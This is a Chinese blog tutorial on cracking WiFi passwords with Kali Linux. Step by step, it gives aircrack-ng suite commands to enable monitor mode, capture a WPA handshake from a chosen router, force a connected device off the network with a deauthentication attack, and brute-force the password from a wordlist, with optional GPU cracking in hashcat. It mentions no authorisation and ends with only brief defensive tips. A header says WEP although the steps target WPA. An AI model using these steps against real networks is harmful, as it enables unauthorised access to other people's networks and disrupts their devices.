Kali Linux使用基于airmon airodump aircrack破解wifi密码

版权声明:Ch3nnnnnnnnnn的博客 https://blog.csdn.net/weixin_43064185/article/details/88728583

AirCrack 套件来破解无线网络的 WEP 密码

最近玩Kali Linux总结一下使用教程
要求:

  1. Kali Linux的计算机(我用的是vmware)
  2. 要有一个外置的网卡,用于Kali Linux做无线网卡
  3. 密码字典
字典可以使用Kali Linux系统自带
gzip -d /usr/share/wordlists/rockyou.txt.gz

操作步骤

  • 打开终端窗口,并产生无线网络接口的列表
ifconfig

在这里插入图片描述

开启无线网卡的监控模式

airmon-ng start wlan0

标注
执行成功之后网卡接口变为wlan0mon, 可以使用ifconfig命令查看

查看wifi网络

会使用 airodump-ng wlan0mon 来定位附近的可用无线网络
在这里插入图片描述
上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。
记住要破解wifi的CH(频道号)和BSSID
按Ctrl-C结束

抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包。其中,对我们最重要的数据包是:包含密码的包-也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。

开始抓包:
    airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8  -w ~/ wlan0mon
    参数解释:
		-c指定频道号
		–bssid指定路由器bssid
		-w指定抓取的数据包保存位置

在这里插入图片描述

强制连接到wifi的设备重新连接路由器

  • 打开另一个终端窗口,为了尝试组合它们,运行 aireplay
    现在我们只要等用户连接/重连接wifi了,运气不好也许要很长时间。
    有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。

打开新终端执行:
aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

参数解释:
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备

在这里插入图片描述
如果成功第一个终端这里就会显示你要攻击的id
在这里插入图片描述
按Ctrl-C结束抓包。
已经得到了想要的握手包了,可以结束无线网卡的监控模式了:

airmon-ng stop wlan0mon

在这里插入图片描述

开始破解密码

aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件

最后是抓取的包

在这里插入图片描述

密码找到(完全取决于字典多大)
当时没有截图 找的别人截好的图
在这里插入图片描述

可选)使用显卡的运算能力

如果你有一个强大的GPU,为什么不使用GPU跑字典呢?

Hashcat可以借助GPU的运算力破解各种不同算法的hash值。

下载时要注意选择正确的显卡类型(AMD、NVidia)。Kali Linux自带这个工具。

在破解cap文件之前,要把它转换为hccap文件:
aircrack-ng file.cap -J out.hccap
使用GPU破解hash:
hashcat -m 2500 out.hccap字典文件

总结:

我一共测试了三个wifi 破解出2个, 防止这种攻击最简单的方法是将密码设置复杂一些 .

不要使用WEP加密方式,非常容易被破解:
Kali Linux破解wifi密码(WEP)
现在的无线路由器都有WPS功能,关了吧:
使用Reaver破解开启了WPS功能的wifi密码(wpa/wpa2)

猜你喜欢

转载自blog.csdn.net/weixin_43064185/article/details/88728583